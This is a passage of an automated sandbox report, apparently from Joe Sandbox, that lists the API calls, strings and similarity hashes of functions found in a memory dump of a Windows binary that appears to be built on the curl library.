free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C8EF9
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C8F13
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C8F2B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C8F38
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C8F57

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$fclose$CleanupFreeLibrary
String ID:
API String ID: 3795980997-0
Opcode ID: 761298a07904b6f9e39af0f612b5bde4ced820fb203bb86f3fece0525eb4634a
Instruction ID: 5b6bb4b2b91180f7e0e5ed9f264a54ddd2f71da523742f475e5a0a025e58384b
Opcode Fuzzy Hash: 761298a07904b6f9e39af0f612b5bde4ced820fb203bb86f3fece0525eb4634a
Instruction Fuzzy Hash: 4F015B76601A22EFC7555F51E948A4DFBA2FF44B62714823FF50056A21CB70A8A1CBD4

Function 000C87A3 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000000,000CD880), ref: 000C87AC
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 000C87B4
_getch.API-MS-WIN-CRT-CONIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 000C87C4
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002), ref: 000C87EF
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00117668,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C87FB

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_funcfputs$_getch
String ID:
API String ID: 3073499726-0
Opcode ID: 9315f2d3a0f159414f7b3755e26b3f002406ae55e905cbcbb1c2fbc3476c6281
Instruction ID: bf632086fab6f8b6fb2d8c9293a0401035214e3a785792af5b5ae05342ba316d
Opcode Fuzzy Hash: 9315f2d3a0f159414f7b3755e26b3f002406ae55e905cbcbb1c2fbc3476c6281
Instruction Fuzzy Hash: 7CF04C33954A51DBC734232C5C0DFEEAB95DFC170AF28823EF59483141EA958C8683AE

Function 000C3A80 Relevance: 7.5, APIs: 6, Instructions: 37COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AB1
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3ABD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AC9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AD5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AE7

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: dce3d1e9657d5d6851fc4d005c993a4ede667fe7ce10beda9c6a19a2f7c3ecf3
Instruction ID: bad2a3428695d3c4cc1836f439b85e7a00867c15caa7959d4136062ff5b21280
Opcode Fuzzy Hash: dce3d1e9657d5d6851fc4d005c993a4ede667fe7ce10beda9c6a19a2f7c3ecf3
Instruction Fuzzy Hash: 8201EC36502B01DFC7755F55D948AAEBBF2AF88701300C90DF89757A21C730A5559F92

Function 000CC72B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 278COMMON

Download Yara Rule

APIs

Part of subcall function 000D027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,000C10B6), ref: 000D028E
Part of subcall function 000D027A: __alldvrm.LIBCMT ref: 000D02A7
Part of subcall function 000D027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D02D1

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000CC75B

Part of subcall function 000D6BA2: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,0000038F,?,000CC775), ref: 000D6BC3
Part of subcall function 000D6BA2: WSACreateEvent.WS2_32 ref: 000D6C4D

Strings

Transfer aborted due to critical error in another transfer, xrefs: 000CC87D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CounterCreateEventPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_time64calloc
String ID: Transfer aborted due to critical error in another transfer
API String ID: 934473979-1939301410
Opcode ID: 4039c3165d9dcabcd5abe79cb1e5e5200e234be5e9f7be80ac92cf2dd59bc570
Instruction ID: 2963e21c877e022adcb09b7b35d5d9560429c25b7589d8fd315a5777877ee6df
Opcode Fuzzy Hash: 4039c3165d9dcabcd5abe79cb1e5e5200e234be5e9f7be80ac92cf2dd59bc570
Instruction Fuzzy Hash: 11A1AF71D04249ABEF15CBA8C448FEEBBF1EB45304F1841AEE819A7252D7719E45CB90

Function 000D00C4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000D012E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,internal error: invalid pattern type (%d),?), ref: 000D0224

Strings

%0*lu, xrefs: 000D018E
internal error: invalid pattern type (%d), xrefs: 000D021D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_funcstrtoul
String ID: %0*lu$internal error: invalid pattern type (%d)
API String ID: 673873880-449433499
Opcode ID: 48676d379543fa4a617d5d33e80e1dcb04e6516910db335cd904903a3baa1b98
Instruction ID: 843a67a9b7bec64c72344a509ad988fcacd374dd8115c4e9c0e7b2a49c390337
Opcode Fuzzy Hash: 48676d379543fa4a617d5d33e80e1dcb04e6516910db335cd904903a3baa1b98
Instruction Fuzzy Hash: 5C51BF39A053059BCF28CF64D894BFEBBB1AF59350F14416EE84AA7382DB319945CB70

Function 000F86B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 164COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,?,?), ref: 000F8704

Strings

Internal error: Unexpected packet, xrefs: 000F88AB
Received too short packet, xrefs: 000F874C
TFTP error: %s, xrefs: 000F8819

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: recvfrom
String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
API String ID: 846543921-343195773
Opcode ID: 743bbf6ea0df10447b65b6118402e7a238b038fccca03b23546b461100a7795e
Instruction ID: b04b88267159e617bb37cd794ec80a2a5210306e30e44522afb11cef281e3132
Opcode Fuzzy Hash: 743bbf6ea0df10447b65b6118402e7a238b038fccca03b23546b461100a7795e
Instruction Fuzzy Hash: AC5126716002199FDB5CDA388C95BF9F7E4BB84310F04C27AE65ED6682DF34E9419BA0

Function 000CE9EB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 000CEA46
isprint.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?), ref: 000CEAF7

Strings

blobpointer, xrefs: 000CE9F1
\x%02x, xrefs: 000CEB05

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: isprintmalloc
String ID: \x%02x$blobpointer
API String ID: 3792030756-13518461
Opcode ID: 358467933cdbbc46f777b2f50a6aa706ef96d9f541463ff8c155f64a19876a97
Instruction ID: cd925218b63d7bf13cb8275b57b2137dfd7e71f20e5b01c47d069aeed7fab82b
Opcode Fuzzy Hash: 358467933cdbbc46f777b2f50a6aa706ef96d9f541463ff8c155f64a19876a97
Instruction Fuzzy Hash: EA412A39A042C6AEDB349F68D801BADBBF1BF58314F28416EE499D3792D3305D91C711

Function 000CF653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 000CF70B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004), ref: 000CF738
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000CF750

Strings

out of memory, xrefs: 000CF7CA

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdupmallocrealloc
String ID: out of memory
API String ID: 178021264-2599737071
Opcode ID: dd5a55bb8e4c17d336a6068ff0051be52cde1b8fb338dc74a8d123c5be4ed717
Instruction ID: 734fadb40d271a8e23a9ef840a34bb3f6e384d69a3881591612ea2f8d24fac90
Opcode Fuzzy Hash: dd5a55bb8e4c17d336a6068ff0051be52cde1b8fb338dc74a8d123c5be4ed717
Instruction Fuzzy Hash: 0A517778508206DFDB64CF28C594BBEBBF6FB09304F1882AED84A9B351D3709941CB52

Function 00106451 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108encryptionCOMMON

Download Yara Rule

APIs

CertFreeCertificateContext.CRYPT32(00000000), ref: 0010657A

Strings

SSL: failed retrieving public key from server certificate, xrefs: 0010654C
SSL: public key does not match pinned public key, xrefs: 0010653D
schannel: Failed to read remote certificate context: %s, xrefs: 00106561

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CertCertificateContextFree
String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: Failed to read remote certificate context: %s
API String ID: 3080675121-2322844371
Opcode ID: 0d58a7b22bfe552548e46a48cc58b86eb6c03fde9bee49da57fc376ecf5bb0f5
Instruction ID: c917b4e4bbbe79623357a3ed84f0a99280d278635aef9c3ebb788798408218b6
Opcode Fuzzy Hash: 0d58a7b22bfe552548e46a48cc58b86eb6c03fde9bee49da57fc376ecf5bb0f5
Instruction Fuzzy Hash: 2731A331B0021A9FDB18DB28EC56BEA77A5AF44750F0440A9E449E72C1EFB0EE948E50

Function 000E4C99 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103stringCOMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000E4D4E
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000E4D65

Strings

%s%s%s, xrefs: 000E4CE5

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchrstrtol
String ID: %s%s%s
API String ID: 614545126-3094730333
Opcode ID: dc54ab5a669cd36f870f55bac6935ff3867d0fab524fd3a180d739ac49c27af6
Instruction ID: 9bd4781e601296301cccf336495e4ed487577fd6b4364e58fea6d7cfc5906d98
Opcode Fuzzy Hash: dc54ab5a669cd36f870f55bac6935ff3867d0fab524fd3a180d739ac49c27af6
Instruction Fuzzy Hash: E4312532A08285EFDF15CF59EC809ADBBE6EF85324F2480A9E945EB341D7B05E40CB50

Function 000C19B1 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000023,?,?,00000100,%*s,?,00116DB0), ref: 000C1A92

Strings

-=O=-, xrefs: 000C19F4
%*s, xrefs: 000C19DB
#, xrefs: 000C1A83

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: fputs
String ID: #$%*s$-=O=-
API String ID: 1795875747-742414071
Opcode ID: f10c9e459c38a55f51a53a52b2d2a250a229285592a3a07bb5a72894c4cd29cf
Instruction ID: 820a7d00c59166aa468f85408bafd6f703826b87fe0f1c97fc1382c6e30492b4
Opcode Fuzzy Hash: f10c9e459c38a55f51a53a52b2d2a250a229285592a3a07bb5a72894c4cd29cf
Instruction Fuzzy Hash: BA41C2707041448FDB48CF6DE884BD977E6AB99310F2482AAE889C7286D7B1D9E4CB54

Function 000C858B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C85D1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C861E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C864D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 000C867C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C86F7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C8795

Strings

option %s: %s, xrefs: 000C876D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strdup$malloc
String ID: option %s: %s
API String ID: 854390910-1899588186
Opcode ID: 605122c6d9cae91ba8f92715b2d27dbfcae0908cca8f8adbe58fd27398ef5180
Instruction ID: 3dcdf2543c9fe20d154aaa6b2c6a815950e429ad42ec3868d208bee702bc1eb5
Opcode Fuzzy Hash: 605122c6d9cae91ba8f92715b2d27dbfcae0908cca8f8adbe58fd27398ef5180
Instruction Fuzzy Hash: 54312531E08294AFDB769B688849FEEBFE59F55310F24C19EE49497142EF708881C798

Function 000E22EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E2326
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E2383

Strings

Too old connection (%ld seconds idle), disconnect it, xrefs: 000E2342
Too old connection (%ld seconds since creation), disconnect it, xrefs: 000E23A3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: Too old connection (%ld seconds idle), disconnect it$Too old connection (%ld seconds since creation), disconnect it
API String ID: 885266447-3566769605
Opcode ID: de19e87872c18acee7a10dcb81f0029ebe215e8063f013076032d6cf73cdefc4
Instruction ID: acfaaa9d1e7e9e712ffe0027b02df809731b1904086526d8da8d64abb9525a88
Opcode Fuzzy Hash: de19e87872c18acee7a10dcb81f0029ebe215e8063f013076032d6cf73cdefc4
Instruction Fuzzy Hash: D8110663A00A506BEB19FE3E4C46AAF369ECF56720F150164FD28BF242E8965E0106D1

Function 000E32EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000E333A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000E336C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E33AA

Strings

Invalid zoneid: %s; %s, xrefs: 000E3383

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errnofreestrtoul
String ID: Invalid zoneid: %s; %s
API String ID: 3069384960-3603716281
Opcode ID: 00930e4d780806819d8814c4e73366faab725e5d104ef1dd9bc2c424242dbacf
Instruction ID: e065a4e33718033008de5ad282b102715b6a075c6db81f23a5e9dab2bfa66d39
Opcode Fuzzy Hash: 00930e4d780806819d8814c4e73366faab725e5d104ef1dd9bc2c424242dbacf
Instruction Fuzzy Hash: 8021D831A00218EFDB289F25DC49FED7BB9EFC5710F1040AAE915A7291DB705E858BA1

Function 000D0320 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 000D0367

Strings

%I64u.%06I64u, xrefs: 000D03A8
"%s":null, xrefs: 000D03C2
"%s":, xrefs: 000D0388

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __alldvrm
String ID: "%s":$"%s":null$%I64u.%06I64u
API String ID: 65215352-1521088119
Opcode ID: 3142a57679e5de47e06a7a35db3cede102db35691033b18a7db5aedb4eaa6b63
Instruction ID: 408ced31fc557e7c8c7a98e5ca947b8d81e23964c496afe4262187600f555959
Opcode Fuzzy Hash: 3142a57679e5de47e06a7a35db3cede102db35691033b18a7db5aedb4eaa6b63
Instruction Fuzzy Hash: 9B11D571508344BFD701DF14DC42B9BBBE9FF68314F04452AF99892221E371DA708BA1

Function 000D2677 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,000E8727,?,?,00000000,?,?,?,000E8849,00000000,?), ref: 000D2698
realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E7EE5,?,?,?,000E8727,?,?,00000000,?,?,?,000E8849,00000000,?,?), ref: 000D26C4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8849,00000000,?,?,?,000D2373,?,?,?,?,000C16C6,?,00200030), ref: 000D26DF

Strings

CURL_SSL_BACKEND, xrefs: 000D267A, 000D267B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: EnvironmentVariablefreerealloc
String ID: CURL_SSL_BACKEND
API String ID: 3604909764-3552431867
Opcode ID: 5e3e402db83cba5af89e55af642bdce20b527cad98d3bfc902639941d8f3c80c
Instruction ID: e2be52337d00a6ce4ca65b0b6117d5f78b0dc3d0bf23dabc7dbba87ccd083688
Opcode Fuzzy Hash: 5e3e402db83cba5af89e55af642bdce20b527cad98d3bfc902639941d8f3c80c
Instruction Fuzzy Hash: F801F73AA05329FB4B354B59EC0885F7AFEEBD5760712807BF801E3300D9B18C418AB5

Function 0010ADF2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 0010AE0A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AE21
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0010AE3D

Strings

%s/%s, xrefs: 0010ADF6

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strdup
String ID: %s/%s
API String ID: 2653869212-2758257063
Opcode ID: 0b9436267fa6e0882ffbc1a3c5e8e689ad999204469aa8f01f45aaa0672cade9
Instruction ID: dc7d94adea8050f8d586f8b594fc1dd66a46c941f4117bf84de8897ef9d5be5f
Opcode Fuzzy Hash: 0b9436267fa6e0882ffbc1a3c5e8e689ad999204469aa8f01f45aaa0672cade9
Instruction Fuzzy Hash: 45F0A733A44530AB87191764FC099AF6BA9DFC5B71315403AF800D3391DFA41C8286E2

Function 000FE886 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,000000FF,00000003,00000000), ref: 000FE8AE
WSAGetLastError.WS2_32(?,?,?,000FE787,00000000), ref: 000FE8B8

Strings

SENT, xrefs: 000FE8D0
Sending data failed (%d), xrefs: 000FE8BF

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLastsend
